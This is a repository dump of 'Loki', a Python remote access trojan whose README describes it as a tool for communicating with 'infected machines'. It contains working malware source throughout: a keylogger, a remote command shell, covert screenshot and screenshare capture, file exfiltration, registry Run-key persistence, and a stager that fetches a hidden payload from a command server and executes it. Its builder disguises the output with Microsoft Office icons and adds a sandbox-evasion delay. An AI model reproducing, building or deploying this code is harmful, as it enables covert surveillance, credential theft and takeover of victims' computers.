Repository: Bitwise-01/Loki Branch: master Commit: da2d2ad1c55a Files: 61 Total size: 777.8 KB Directory structure: gitextract_umcxirla/ ├── .gitignore ├── CHANGELOG.md ├── LICENSE ├── README.md ├── agent/ │ ├── bot/ │ │ ├── lib/ │ │ │ ├── __init__.py │ │ │ ├── file.py │ │ │ ├── info.py │ │ │ ├── keylogger.py │ │ │ ├── pathfinder.py │ │ │ ├── screen.py │ │ │ ├── session.py │ │ │ ├── sftp.py │ │ │ ├── shell.py │ │ │ ├── sscreenshare.py │ │ │ └── ssh.py │ │ ├── template_payload.py │ │ └── template_stager.py │ ├── builder.py │ ├── const.py │ └── lib/ │ ├── __init__.py │ ├── args.py │ └── file.py ├── lib/ │ ├── __init__.py │ ├── const.py │ ├── database.py │ └── server/ │ ├── __init__.py │ ├── lib/ │ │ ├── __init__.py │ │ ├── file.py │ │ ├── interface.py │ │ ├── session.py │ │ ├── sftp.py │ │ ├── shell.py │ │ ├── sscreenshare.py │ │ └── ssh.py │ └── server.py ├── linter.sh ├── loki.py ├── requirements.txt ├── static/ │ ├── css/ │ │ ├── control.css │ │ ├── home.css │ │ ├── index.css │ │ ├── intel.css │ │ ├── main.css │ │ └── settings.css │ ├── js/ │ │ ├── command.js │ │ ├── console.js │ │ ├── exception.js │ │ ├── home.js │ │ ├── index.js │ │ ├── settings.js │ │ ├── ssh.js │ │ └── terminal.js │ └── vendor/ │ └── bootstrap-4.4.1-dist/ │ ├── css/ │ │ ├── bootstrap-grid.css │ │ ├── bootstrap-reboot.css │ │ └── bootstrap.css │ └── js/ │ ├── bootstrap.bundle.js │ └── bootstrap.js └── templates/ ├── base.html ├── home.html ├── index.html └── settings.html ================================================ FILE CONTENTS ================================================ ================================================ FILE: .gitignore ================================================ # Generated samples output/ .bin/ # Python cache __pycache__/ # RSA key-pair cert/ # VS Code .vscode # Database database/ *.db # Virtual environment env_loki # Downloads path downloads/ # Screenshare path static/img/ ================================================ FILE: CHANGELOG.md ================================================ # Changelog Changes for this project will be documented here ## [0.1.1] - 2020-03-12 ### Changed - UI - Lighter payload size; from 22,773 KB to 9,490 KB - Builder only outputs exe ### Removed - Tasks ================================================ FILE: LICENSE ================================================ MIT License Copyright (c) 2018 Mohamed Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions: The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software. THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. ================================================ FILE: README.md ================================================ # Loki Loki is a simple **R**emote **A**ccess **T**ool.
Loki uses **RSA-2048** with **AES-256** to keep your communication with infected machines secure.
[![Version](https://img.shields.io/badge/Version-v0.1.1-blue)]() [![Python](https://img.shields.io/badge/Python-v3.6%2B-blue)]() [![Discord](https://img.shields.io/badge/Discord-server-blue)](https://discord.gg/VYRAZg5) [![Donate](https://img.shields.io/badge/PayPal-Donate-orange.svg)](https://www.paypal.me/Msheikh03)

### Disclaimer ``` THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. ``` Loki, just like all my other repos is stricly for **educational** purposes. ### Requirements - Python **3.6.x** | **3.7.x** | **3.8.x** ### Server tested on - Windows 10 - Kali Linux ### Bot tested on - Windows 10 ### Payload generator tested on - Windows 10 ### Features - Upload & Download - Chrome Launching - Persistence - Screenshare - Screenshot - Keylogger - SFTP - SSH ### Video https://www.youtube.com/watch?v=UTfZlXGoJ5Y ### Installation ```shell $> pip install -r requirements.txt ``` ### Server side 1. Open `/lib/const.py` & configure your private and public IP's 2. Start loki.py 3. Navigate to http://localhost:5000 4. Login ``` Username: loki Password: ikol ``` 5. Start the server on the same IP as your private IP ### Generate a payload Navigate to agent directory and run the following command ```shell $> python builder.py -h ``` **It will not compile inside a virtual environment** ### After connection - You can click the id of the bot once it connects ### FYI - The bot will call the server using the Public IP, not the private IP - The bot will call the server using the port specified on the server tab ================================================ FILE: agent/bot/lib/__init__.py ================================================ # Date: 06/02/2018 # Author: Pure-L0G1C # Description: __init__ ================================================ FILE: agent/bot/lib/file.py ================================================ # Date: 08/31/2018 # Author: Pure-L0G1C # Description: File manager class File(object): chunk_size = (64 << 10) - 1 @classmethod def read(cls, file): with open(file, 'rb') as f: while True: data = f.read(cls.chunk_size) if data: yield data else: break @classmethod def write(cls, file, data): with open(file, 'wb') as f: for n in range(0, len(data), cls.chunk_size): _max = n + cls.chunk_size _data = data[n:_max] f.write(_data.encode() if isinstance(_data, str) else _data) ================================================ FILE: agent/bot/lib/info.py ================================================ # Date: 07/22/2018 # Author: Pure-L0G1C # Description: Machine information import socket from uuid import getnode from requests import get from hashlib import sha256 from getpass import getuser from platform import system, node, release, version class System(object): def __init__(self): self.system = system() self.hostname = node() self.release = release() self.version = version() self.username = getuser() self.uuid = self.get_id() def get_id(self): return sha256((str(getnode()) + getuser()).encode()).digest().hex() def sys_info(self): return { 'uuid': self.uuid, 'system': self.system, 'release': self.release, 'version': self.version, 'hostname': self.hostname, 'username': self.username } class Geo(object): def __init__(self): self.geo = self.get_geo() self.internal_ip = self.get_internal_ip() def get_internal_ip(self): try: return socket.gethostbyname_ex(socket.gethostname())[-1][-1] except: return '' def get_geo(self): try: return get('http://ip-api.com/json').json() except: pass def net_info(self): data = self.get_geo() if data: i_ip = self.internal_ip if i_ip: data['internalIp'] = i_ip return data class Information(object): def __init__(self): self.net_info = Geo().net_info() self.sys_info = System().sys_info() def parse(self, data): data = { 'lat': data['lat'] if 'lat' in data else '', 'lon': data['lon'] if 'lon' in data else '', 'zip': data['zip'] if 'zip' in data else '', 'isp': data['isp'] if 'isp' in data else '', 'city': data['city'] if 'city' in data else '', 'query': data['query'] if 'query' in data else '', 'country': data['country'] if 'country' in data else '', 'timezone': data['timezone'] if 'timezone' in data else '', 'regionName': data['regionName'] if 'regionName' in data else '', 'internalIp': data['internalIp'] if 'internalIp' in data else '' } if '/' in data['timezone']: data['timezone'] = data['timezone'].replace('/', ' ') if '_' in data['timezone']: data['timezone'] = data['timezone'].replace('_', ' ') return data def get_info(self): data = self.net_info return { 'sys_info': self.sys_info, 'net_info': self.parse(data if data else []) } ================================================ FILE: agent/bot/lib/keylogger.py ================================================ # Date: 09/30/2018 # Author: Pure-L0G1C # Description: Keylogger from threading import Thread from pynput.keyboard import Key, Listener class Keylogger(object): def __init__(self): self.data = [] self.lastkey = None self.listener = None self.is_alive = True self.num_to_symbol = { '1': '!', '2': '@', '3': '#', '4': '$', '5': '%', '6': '^', '7': '&', '8': '*', '9': '(', '0': ')' } self.sym_to_symbol = { '`': '~', ',': '<', '.': '>', '/': '?', '\'': '\"', '\\': '|', ';': ':', '[': '{', ']': '}', '-': '_', '=': '+' } def _start(self): with Listener(on_press=self.on_press, on_release=self.on_release) as self.listener: self.listener.join() def start(self): Thread(target=self._start, daemon=True).start() def stop(self): self.listener.stop() self.is_alive = False def dump(self): data = '' if not self.is_empty(): data = ''.join(self.data) print(data) self.data = [] return data if data else '-1' def on_release(self, key): if any([key == Key.shift, key == Key.shift_r]): self.lastkey = None def on_press(self, key): value = None if key == Key.backspace: if len(self.data): del self.data[-1] elif key == Key.tab: value = '\t' elif key == Key.enter: value = '\n' elif key == Key.space: value = ' ' elif len(str(key)) == 3: value = self.check_for_shift(key) else: self.lastkey = key if value != None: self.data.append(value) def check_for_shift(self, key): key = key.char if any([self.lastkey == Key.shift, self.lastkey == Key.shift_r]): key = (key.upper() if key.isalpha() else self.num_to_symbol[key] if key.isdigit() else self.sym_to_symbol[key] if key in self.sym_to_symbol else key) return key def is_empty(self): is_empty = True for data in self.data: if data.strip(): is_empty = False break return is_empty ================================================ FILE: agent/bot/lib/pathfinder.py ================================================ # Date: 08/31/2018 # Author: Pure-L0G1C # Description: Finds a random path import os from random import randint from getpass import getuser class Finder(object): root_dir = os.path.abspath(os.path.sep) + os.path.sep + \ 'Users' + os.path.sep + getuser() + os.path.sep + 'AppData' @staticmethod def is_bad(root, dirs, files): return not all([len(dirs), len(files), len(os.path.normpath(root).split(os.sep)) >= 5]) @staticmethod def choice(items): for _ in range(randint(3, 10)): n = randint(0, len(items)-1) return items[n] @classmethod def find(cls): paths = [] for root, dirs, files in os.walk(cls.root_dir, topdown=True): if cls.is_bad(root, dirs, files): continue _dir = cls.choice(dirs) if '.' in _dir: continue else: path = root + os.path.sep + _dir paths.append(path) return cls.choice(paths) + os.path.sep ================================================ FILE: agent/bot/lib/screen.py ================================================ # Date: 08/13/2018 # Author: Pure-L0G1C # Description: Screen shot from mss import mss from os import path, remove file = 'screen.png' def screenshot(): with mss() as sct: sct.shot(mon=-1, output=file) def clean_up(): if path.exists(file): try: remove(file) except: pass ================================================ FILE: agent/bot/lib/session.py ================================================ # Date: 06/02/2018 # Author: Pure-L0G1C # Description: Session import json import const import socket from time import sleep from lib.info import Information from socket import timeout as TimeOutError class Session(object): def __init__(self, session): self.session = session self.sys_info = Information().get_info() def shutdown(self): try: self.session.shutdown(socket.SHUT_RDWR) self.session.close() except: pass def initial_communication(self): sleep(0.5) self.send(code=const.CONN_CODE, args=self.sys_info) services = self.recv() return services def connect(self, ip, port): try: self.session.connect((ip, port)) print('Establishing a secure connection ...') return self.initial_communication() except: pass def struct(self, code=None, args=None): return json.dumps({'code': code, 'args': args}).encode() def send(self, code=None, args=None): data = self.struct(code, args) try: self.session.sendall(data) except: pass def recv(self, size=4096): try: return json.loads(self.session.recv(size)) except TimeOutError: return -1 except: pass ================================================ FILE: agent/bot/lib/sftp.py ================================================ # Date: 07/27/2018 # Author: Pure-L0G1C # Description: Secure FTP import os import ssl import socket from os import chdir from . import screen from . file import File from time import sleep, time from socket import timeout as TimeOutError class sFTP(object): def __init__(self, ip, port, home, max_time=10, verbose=False): self.ip = ip self.port = port self.home = home self.verbose = verbose self.max_time = max_time self.chunk_size = 0xffff self.session_size = 0x1000 self.recipient_session = None def display(self, msg): if self.verbose: print('{}\n'.format(msg)) def read_file(self, file): with open(file, 'rb') as f: while True: data = f.read(self.chunk_size) if data: yield data else: break def test_tunnel(self): value = b'abc123' self.recipient_session.sendall(value) if self.recipient_session.recv(self.session_size) == value: return True return False def send_file(self, file): self.test_tunnel() chdir(self.home) if not os.path.exists(file): self.display('File `{}` does not exist'.format(file)) return -1 # send file's name sleep(0.5) print('Sending file\'s name ...') self.recipient_session.sendall(os.path.basename(file).encode('utf8')) # send file's data sleep(0.5) self.display('Sending {} ...'.format(file)) chdir(self.home) for data in File.read(file): self.recipient_session.sendall(data) self.display('File sent') def recv_file(self): _bytes = b'' # receive file's name file_name = self.recipient_session.recv(self.session_size) # receive file's data self.display('Downloading {} ...'.format(file_name)) while True: data = self.recipient_session.recv(self.chunk_size << 2) if data: _bytes += data else: break return file_name, _bytes def close(self): try: self.recipient_session.close() self.recipient_session.shutdown(socket.SHUT_RDWR) except: pass def socket_obj(self): chdir(self.home) sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.settimeout(10) for i in range(30): try: self.recipient_session = ssl.wrap_socket( sock, ssl_version=ssl.PROTOCOL_SSLv23) self.recipient_session.connect((self.ip, self.port)) return 0 except: sleep(0.5) return -1 def send(self, file): if self.socket_obj() == -1: return -1 try: started = time() self.send_file(file) self.display('Time-elapsed: {}(sec)'.format(time() - started)) except: pass finally: self.close() def recv(self): if self.socket_obj() == -1: return -1 try: started = time() file_name, data = self.recv_file() chdir(self.home) File.write(file_name, data) self.display('Time-elapsed: {}(sec)'.format(time() - started)) except: pass finally: self.close() ================================================ FILE: agent/bot/lib/shell.py ================================================ # Date: 06/04/2018 # Author: Pure-L0G1C # Description: Communicate with server import sys import subprocess from os import chdir from time import sleep from queue import Queue from threading import Thread, RLock from . import ssh, sftp, screen, sscreenshare, keylogger class Shell(object): def __init__(self, sess_obj, services, home): self.recv_queue = Queue() self.disconnected = False self.services = services self.session = sess_obj self.home = home self.is_alive = True self.lock = RLock() self.ftp = None self.ssh = None self.keylogger = None self.screenshare = None self.cmds = { 1: self.ssh_obj, 2: self.reconnect, 3: self.download, 4: self.upload, 5: self.screen, 6: self.chrome, 7: self.disconnect, 8: self.create_persist, 9: self.remove_persist, 12: self.logger_start, 13: self.logger_stop, 14: self.logger_dump, 15: self.screenshare_start, 16: self.screenshare_stop } def listen_recv(self): while self.is_alive: recv = self.session.recv() if recv == -1: continue # timed out if recv: with self.lock: self.recv_queue.put(recv) else: if self.is_alive: self.is_alive = False self.display_text('Server went offline') def parser(self): while self.is_alive: if self.recv_queue.qsize(): data = self.recv_queue.get() code = data['code'] args = data['args'] self.display_text(data['args']) if code in self.cmds: Thread(target=self.cmds[code], args=[ args], daemon=True).start() def stop(self): if self.ssh: self.ssh.close() if self.ftp: self.ftp.close() if self.keylogger: self.keylogger.stop() if self.screenshare: self.screenshare.stop() def shell(self): t1 = Thread(target=self.listen_recv) t2 = Thread(target=self.parser) t1.daemon = True t2.daemon = True t1.start() t2.start() while self.is_alive: try: sleep(0.5) except: break self.close() def send(self, code=None, args=None): self.session.send(code=code, args=args) # -------- UI -------- # def display_text(self, text): print('{0}Response: {1}{0}'.format('\n\n\t', text)) def close(self): self.is_alive = False self.session.shutdown() self.stop() def reconnect(self, args): print('Reconnecting ...') self.close() def disconnect(self, args): print('Disconnecting ...') self.disconnected = True self.close() def ssh_obj(self, args): if self.ssh: self.ssh.close() self.ssh = ssh.SSH( self.services['ssh']['ip'], self.services['ssh']['port'], self.home) t = Thread(target=self.ssh.client) t.daemon = True t.start() def screenshare_start(self, update): if self.screenshare: self.screenshare.stop() self.screenshare = sscreenshare.ScreenShare( self.services['ftp']['ip'], self.services['ftp']['port'], update ) if self.screenshare.setup() != 0: self.screenshare = None else: Thread(target=self.screenshare.start, daemon=True).start() def screenshare_stop(self, args): if self.screenshare: self.screenshare.stop() def download(self, args): print('Downloading ...') self.ftp = sftp.sFTP( self.services['ftp']['ip'], self.services['ftp']['port'], self.home, verbose=True) try: self.ftp.recv() except: pass finally: self.ftp.close() def upload(self, file): print('Uploading {}'.format(file)) self.ftp = sftp.sFTP( self.services['ftp']['ip'], self.services['ftp']['port'], self.home, verbose=True) try: self.ftp.send(file) except: pass finally: self.ftp.close() def screen(self, args): chdir(self.home) screen.screenshot() self.upload(screen.file) screen.clean_up() def chrome(self, urls): if '-1' in urls: return cmd = 'start chrome -incognito {}'.format(' '.join(urls)) subprocess.Popen(cmd, shell=True, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE) def create_persist(self, args): if hasattr(sys, 'frozen'): _path = sys.executable cmd = r'reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v loki /f /d "\"{}\""'.format( _path) subprocess.Popen(cmd, shell=True, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE) def remove_persist(self, args): if hasattr(sys, 'frozen'): cmd = r'reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v loki /f' subprocess.Popen(cmd, shell=True, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE) def logger_start(self, args): if not self.keylogger: self.keylogger = keylogger.Keylogger() self.keylogger.start() def logger_stop(self, args): if self.keylogger: self.keylogger.stop() def logger_dump(self, args): if self.keylogger: self.send(-0, self.keylogger.dump()) ================================================ FILE: agent/bot/lib/sscreenshare.py ================================================ # Date: 10/03/2019 # Author: Mohamed # Description: Secure Screenshare import os import ssl import time import socket from mss import mss from . file import File class ScreenShare: image = 'image.png' EOF = ''.encode() def __init__(self, ip, port, update=5): self.ip = ip self.port = port self.is_alive = True self.update = update self.recipient_session = None def socket_obj(self): sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.settimeout(10) try: print('Starting screenshare ...') self.recipient_session = ssl.wrap_socket( sock, ssl_version=ssl.PROTOCOL_SSLv23 ) self.recipient_session.connect((self.ip, self.port)) except: return -1 def send_image(self): with mss() as sct: while self.is_alive: # Capture the screen sct.shot(mon=-1, output=self.image) # Send screenshot for data in File.read(self.image): self.recipient_session.sendall(data) # Send EOF code self.recipient_session.sendall(self.EOF) time.sleep(self.update) def setup(self): if self.socket_obj() == -1: return -1 return 0 def start(self): try: self.send_image() except Exception as e: print('Errors:', e) self.stop() def stop(self): if not self.is_alive: return print('Stopping screenshare ...') self.is_alive = False try: self.recipient_session.close() self.recipient_session.shutdown(socket.SHUT_RDWR) except: pass # Remove image try: os.remove(self.image) except: pass ================================================ FILE: agent/bot/lib/ssh.py ================================================ # Date: 07/27/2018 # Author: Pure-L0G1C # Description: Secure shell import os import ssl import socket import subprocess from queue import Queue from threading import Thread from socket import timeout as TimeOutError class Communicate(object): def __init__(self, session): self.recvs_decrypted = Queue() self.session_recv = 4096 << 12 self.session = session self.is_alive = True self.pending = False def recv(self): self.session.settimeout(0.5) while self.is_alive: try: recv = self.session.recv(self.session_recv) if recv: self.pending = False data = recv.decode('utf8') if data != '-1': self.recvs_decrypted.put(data) else: self.stop() except: pass def send(self, data): if len(data.strip()): if not self.is_alive: return try: self.session.sendall(data.encode('utf8')) self.pending = True except: pass def start(self): recv = Thread(target=self.recv) recv.daemon = True recv.start() def stop(self): self.is_alive = False class Client(object): def __init__(self, communication, home): self.communication = communication self.is_alive = True self.home = home def start(self): self.communication.start() while all([self.is_alive, self.communication.is_alive]): while self.communication.recvs_decrypted.qsize(): cmd = self.communication.recvs_decrypted.get() output = self.exe(cmd) self.communication.send(output) self.communication.send('-1') def exe(self, cmd): if cmd.strip() == 'cls': return '-1' try: proc = subprocess.Popen(cmd, shell=True, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE).communicate() output = proc[0].decode('utf8') errors = proc[1].decode('utf8') output = output if output else errors except Exception as e: output = f'Error: {e}' if cmd.split()[0] == 'cd': if len(cmd.split()) != 1: path = ' '.join(cmd.split()[1:]) if os.path.exists(path): os.chdir(path) else: os.chdir(self.home) output = os.getcwd() return output if len(output) else '-1' def stop(self): self.is_alive = False self.communication.is_alive = False class SSH(object): def __init__(self, ip, port, home, max_time=10, verbose=False): self.ip = ip self.port = port self.home = home self.verbose = verbose self.cert = 'public.crt' self.max_time = max_time self.communication = None self.recipient_session = None def display(self, msg): if self.verbose: print('{}\n'.format(msg)) def close(self): try: if self.communication: self.communication.stop() self.recipient_session.close() self.recipient_session.shutdown(socket.SHUT_RDWR) except: pass def send(self, cmd): if self.communication: return self.communication.send(cmd) def socket_obj(self): sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.settimeout(self.max_time) for i in range(30): try: self.recipient_session = ssl.wrap_socket( sock, ssl_version=ssl.PROTOCOL_SSLv23) self.recipient_session.connect((self.ip, self.port)) return 0 except: sleep(0.5) return -1 def client(self): if self.socket_obj() == -1: self.display('Failed to connect to {}:{}'.format( self.ip, self.port)) return -1 communication = Communicate(self.recipient_session) if self.communication: self.communication.stop() self.communication = Client(communication, self.home) self.communication.start() return 0 ================================================ FILE: agent/bot/template_payload.py ================================================ # Date: 06/04/2018 # Author: Pure-L0G1C # Description: Bot import sys import ssl import socket from time import sleep from random import randint from lib import shell, session from os import getcwd, path, chdir # wait, we might be in a sandbox. sleep(randint(16, wait_time)) # auto persist AUTO_PERSIST = auto_persist if AUTO_PERSIST: shell.Shell(None, None, None).create_persist(None) # executable if hasattr(sys, 'frozen'): chdir(path.dirname(sys.executable[:-2])) # address IP = addr_ip PORT = addr_port class Bot(object): def __init__(self, home): self.shell = None self.home = home self.conn = None self.port = None self.ip = None def shutdown(self): try: self.conn.shutdown(socket.SHUT_RDWR) self.conn.close() except: pass def connect(self): sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.settimeout(10) self.conn = ssl.wrap_socket(sock, ssl_version=ssl.PROTOCOL_SSLv23) s = session.Session(self.conn) services = s.connect(self.ip, self.port) if not services: self.ip, self.port, self.is_active = None, None, False self.display_text( 'Server is unavailable, trying again in a bit') else: self.shell = shell.Shell(s, services['args'], self.home) self.is_active = True self.shell.shell() # -------- UI -------- # def display_text(self, text): print('{0}{1}{0}'.format('\n\n\t', text)) def contact_server(self, ip, port): self.ip, self.port = ip, int(port) try: self.connect() except: pass finally: self.shutdown() if __name__ == '__main__': home = getcwd() while True: chdir(home) bot = Bot(home) bot.contact_server(IP, PORT) if bot.shell: if bot.shell.disconnected: break try: sleep(randint(30, 60)) except: break del bot ================================================ FILE: agent/bot/template_stager.py ================================================ import subprocess import ssl import json import socket import time import random import os from lib import pathfinder # Constants IP = addr_ip PORT = addr_port BLOCK_SIZE = block_size STAGER_CODE = stager_code PAYLOAD_FILE = output_file HIDE_PAYLOAD = hide_payload def connect(): # sock obj sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.settimeout(10) # connect sess = ssl.wrap_socket(sock, ssl_version=ssl.PROTOCOL_SSLv23) while True: try: sess.connect((IP, PORT)) print('Establishing connection...') break except: time.sleep(random.randint(15, 30)) return sess def get_payload(sess): # request payload sess.sendall(json.dumps({'code': STAGER_CODE, 'args': None}).encode()) # download payload payload = b'' print('Downloading payload...') while True: try: payload += sess.recv(BLOCK_SIZE) except: break return payload while True: payload = get_payload(connect()) if len(payload): break print('Failed to download payload.\nRetrying...') time.sleep(random.randint(15, 30)) # write to file path = os.path.join(pathfinder.Finder().find(), PAYLOAD_FILE) if HIDE_PAYLOAD else PAYLOAD_FILE with open(path, 'wb') as f: for i in range(0, len(payload), BLOCK_SIZE): f.write(payload[i:i + BLOCK_SIZE]) # execute subprocess.call(path.split(), shell=True) ================================================ FILE: agent/builder.py ================================================ # Date: 09/01/2018 # Author: Pure-L0G1C # Description: Execute creator import os import sys import zlib import shlex import shutil import smtplib import tempfile import const from lib.file import File from lib.args import Args try: from PyInstaller import __main__ as pyi, is_win except: print('Please install Pyinstaller: pip install pyinstaller') sys.exit(1) class Executor(object): def __init__(self, ip, port, filename, wait, icon, hide, persist): self.ip = ip self.port = port self.hide = hide self.wait = wait self.binary = b'' self.persist = persist self.filename = filename self.icon = shlex.quote(icon) self.output_dir = 'output' self.tmp_dir = tempfile.mkdtemp() self.dist_path = os.path.join(self.tmp_dir, 'application') self.output_dir = 'output' self.dist_path = os.path.join(self.tmp_dir, 'application') # Stager self.stager_template = os.path.join('bot', 'template_stager.py') self.stager_py_temp = os.path.join('bot', filename + '.py') self.stager_compiled = os.path.join(self.dist_path, filename + '.exe') # Payload self.bot_template = os.path.join('bot', 'template_payload.py') payload_name = os.path.splitext( os.path.basename(const.PAYLOAD_PATH))[0] self.bot_py_temp = os.path.join('bot', payload_name + '.py') self.bot_compiled = os.path.join( self.dist_path, payload_name + '.exe') def replace(self, data, _dict): for k in _dict: data = data.replace(k, _dict[k]) return data def compile_file(self, path): path = os.path.abspath(path) build_path = os.path.join(self.tmp_dir, 'build') cmd = 'pyinstaller -y -F -w -i {} {}'.format( self.icon, shlex.quote(path)) sys.argv = shlex.split(cmd) + ['--distpath', self.dist_path] + \ ['--workpath', build_path] + ['--specpath', self.tmp_dir] pyi.run() def write_template(self, template, py_temp, _dict): data = '' for _data in File.read(template, False): data += _data File.write(py_temp, self.replace(data, _dict)) self.compile_file(py_temp) def compile_stager(self): args = { 'addr_ip': repr(self.ip), 'addr_port': str(self.port), 'block_size': repr(const.BLOCK_SIZE), 'stager_code': repr(const.STAGER_CODE), 'output_file': repr(self.filename + '_.exe'), 'hide_payload': str(self.hide), } self.write_template(self.stager_template, self.stager_py_temp, args) self.move_file(self.stager_compiled, self.output_dir) def compile_bot(self): args = { 'addr_ip': repr(self.ip), 'addr_port': str(self.port), 'wait_time': str(self.wait), 'auto_persist': repr(self.persist) } self.write_template(self.bot_template, self.bot_py_temp, args) payload_output = os.path.dirname(const.PAYLOAD_PATH) self.move_file(self.bot_compiled, payload_output) def move_file(self, file, output_dir): file = os.path.basename(file) _path = os.path.join(output_dir, file) if not os.path.exists(output_dir): os.mkdir(output_dir) if os.path.exists(_path): os.remove(_path) path = os.path.join(self.dist_path, file) shutil.move(path, output_dir) def start(self): self.compile_bot() self.compile_stager() self.clean_up() def clean_up(self): shutil.rmtree(self.tmp_dir) os.remove(self.bot_py_temp) os.remove(self.stager_py_temp) if __name__ == '__main__': args = Args() if args.set_args(): if not args.icon: icons = { 1: 'icons/wordicon.ico', 2: 'icons/excelicon.ico', 3: 'icons/ppticon.ico' } option = input( '\n\n1) MS Word\n2) MS Excel\n3) MS Powerpoint\n\nSelect an icon option: ') if not option.isdigit(): args.icon = icons[1] elif int(option) > 3 or int(option) < 1: args.icon = icons[1] else: args.icon = icons[int(option)] args.icon = os.path.abspath(args.icon) executor = Executor(args.ip, args.port, args.name, args.wait, args.icon, args.hide, args.persist) executor.start() os.system('cls' if is_win else 'clear') print('\nFinished generating {}'.format(executor.filename + '.exe')) print('Look in the directory named \'output\' for your exe file') ================================================ FILE: agent/const.py ================================================ PAYLOAD_PATH = '.bin/.payload.exe' BLOCK_SIZE = 65535 STAGER_CODE = 0 CONN_CODE = 1 ================================================ FILE: agent/lib/__init__.py ================================================ ================================================ FILE: agent/lib/args.py ================================================ # Date: 08/24/2018 # Author: Pure-L0G1C # Description: Arguments from os import path from re import match from argparse import ArgumentParser class Args(object): def __init__(self): self.ip = None self.port = None self.name = None self.wait = None self.icon = None self.hide = None self.persist = None def error(self, error): print('Error: {}'.format(error)) def get_args(self): parser = ArgumentParser() parser.add_argument('-i', '--ip', required=True, help='the ip of the C&C server. \ Example: -i 127.0.0.1') parser.add_argument('-p', '--port', required=True, help='the port of the C&C server. \ Example: -p 8080') parser.add_argument('-n', '--name', required=True, help='the name of the output file. \ Example: -n myvirus') parser.add_argument('-w', '--wait', default=17, help='time in seconds before calling C&C. \ Example: -w 17') parser.add_argument('-ic', '--icon', default=None, help='the output type.\ Example: -ic FILE.ico \ Example: -ic FILE.exe') parser.add_argument('-hd', '--hide', default=False, action='store_true', help='hide the executable when executed. \ Example: --hide') parser.add_argument('-ap', '--autopersist', default=False, dest='persist', action='store_true', help='Auto persist when executed. \ Example: -ap') return parser.parse_args() def set_args(self): args = self.get_args() self.ip = args.ip self.port = args.port self.name = args.name self.hide = args.hide self.wait = args.wait self.icon = args.icon self.persist = args.persist if any([not self.valid_ip, not self.valid_port, not self.valid_wait, not self.valid_icon]): return False return True @property def valid_ip(self): if not match(r'^(?!0)(?!.*\.$)((1?\d?\d|25[0-5]|2[0-4]\d)(\.|$)){4}$', self.ip): self.error('Invalid IP address') return False return True @property def valid_port(self): # check if number for item in self.port: if not item.isdigit(): return False # check if number starts with a zero if int(self.port[0]) == 0: return False # check if number is larger than 65535 if int(self.port) > 65535: return False self.port = int(self.port) return True @property def valid_icon(self): if not self.icon: return True if not path.exists(self.icon): self.error( 'Check your path to your icon, `{}` does not exist'.format(self.icon)) return False else: if not any([self.icon.endswith('exe'), self.icon.endswith('ico')]): self.error('Icon file must be a .ico or .exe') return False return True @property def valid_wait(self): wait = str(self.wait) if not wait.isdigit(): self.error('Wait must be a number') return False elif int(wait) < 17: self.error('Wait must not be less than 17') return False else: self.wait = int(wait) return True ================================================ FILE: agent/lib/file.py ================================================ # Date: 08/31/2018 # Author: Pure-L0G1C # Description: File manager class File(object): chunk_size = (64 << 10) - 1 @classmethod def read(cls, file, _bytes=True): with open(file, 'rb' if _bytes else 'rt') as f: while True: data = f.read(cls.chunk_size) if data: yield data else: break @classmethod def write(cls, file, data): with open(file, 'wb') as f: for n in range(0, len(data), cls.chunk_size): _max = n + cls.chunk_size _data = data[n:_max] f.write(_data.encode() if isinstance(_data, str) else _data) ================================================ FILE: lib/__init__.py ================================================ # Date: 07/03/2018 # Author: Pure-L0G1C ================================================ FILE: lib/const.py ================================================ # Date: 08/13/2018 # Author: Pure-L0G1C # Description: Config file import os ################ # READ ME # ################ ####################################################################################################### ### This is only required if you are connecting to computers outside of your network ### # # If you are connecting to computers outside # of your network, you must enable port forwarding # on your router. You must have have the FTP_PORT, SSH_PORT # and the port you started the server on open on your router. Both the FTP_PORT and SSH_PORT # can be confirgured below. # # You must also set the PRIVATE_IP as the ip of your computer # and set the PUBLIC_IP as your public ip. # ####################################################################################################### #################### Configuration Section #################### # ip PRIVATE_IP = "127.0.0.1" # IP from your router to your pc PUBLIC_IP = "127.0.0.1" # IP from your ISP to your router # ports FTP_PORT = 128 SSH_PORT = 256 #################### DO NOT TOUCH ANYTHING BELOW #################### VERSION = "v0.1.1" # database DATABASE = "database/database.db" if not os.path.exists(os.path.dirname(DATABASE)): os.makedirs(os.path.dirname(DATABASE)) # account LOCK_TIME = 300 # in seconds MAX_FAILED_ATTEMPTS = 3 